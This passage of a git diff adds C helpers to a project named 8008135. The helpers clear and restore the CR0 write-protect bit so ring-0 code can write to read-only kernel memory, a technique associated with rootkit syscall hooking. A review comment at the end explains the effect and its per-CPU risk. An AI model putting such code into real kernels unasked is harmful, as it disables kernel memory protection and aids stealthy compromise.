+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+#ifndef SRC_HEADERS_p463unpr073c7_H
+#define SRC_HEADERS_p463unpr073c7_H
+
+#include
+#include "asm/special_insns.h"
+
+/**** defines *****************************************************************
+*******************************************************************************/
+#define WRITE_PROTECT_FLAG (1<<16)
+
+extern void wprotectionoff(void);
+extern void wprotectionon(void);
+
+#endif
diff --git a/src/p463unpr073c7.c b/src/p463unpr073c7.c
new file mode 100644
index 0000000..904825a
--- /dev/null
+++ b/src/p463unpr073c7.c
@@ -0,0 +1,48 @@
+/* -*- Mode: C; indent-tabs-mode: t; c-basic-offset: 4; tab-width: 4 -*- */
+/*
+ * main.c
+ * Copyright (C) 2019
+ *
+ * 8008135 is free software: you can redistribute it and/or modify it
+ * under the terms of the GNU General Public License as published by the
+ * Free Software Foundation, either version 3 of the License, or
+ * (at your option) any later version.
+ *
+ * 8008135 is distributed in the hope that it will be useful, but
+ * WITHOUT ANY WARRANTY; without even the implied warranty of
+ * MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
+ * See the GNU General Public License for more details.
+ *
+ * You should have received a copy of the GNU General Public License along
+ * with this program. If not, see .
+ */
+
+/*******************************************************************************/
+
+/**** includes *****************************************************************
+*******************************************************************************/
+#include "p463unpr073c7.h"
+
+/*******************************************************************************/
+
+
+/*** FUNCTION ****************************************************************
+* NAME: wprotectionoff
+* DESCRIPTION: turn page write protection off
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+void wprotectionoff(void){
+ write_cr0(read_cr0() & (~WRITE_PROTECT_FLAG));
+}
+
+/*** FUNCTION ****************************************************************
+* NAME: wprotectionon
+* DESCRIPTION: turn page write protection on
+* PARAMETERS: -
+* RETURNS:
+*******************************************************************************/
+
+void wprotectionon(void){
+ write_cr0(read_cr0() | WRITE_PROTECT_FLAG);
+}
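Review bot: The banners for wprotectionoff and wprotectionon describe the effect only as turning "page write protection" off and on, which understates what the code does. `WRITE_PROTECT_FLAG` is bit 16 of CR0, so the comment should say something like `/* clears CR0.WP on the executing CPU: ring-0 writes to read-only mappings succeed until wprotectionon() sets the bit again */`. Nothing visible here keeps the caller on the same CPU between the two calls, so the window in which kernel read-only data is writable is not bounded by these helpers; that deserves a note at the call sites in 8008135.c.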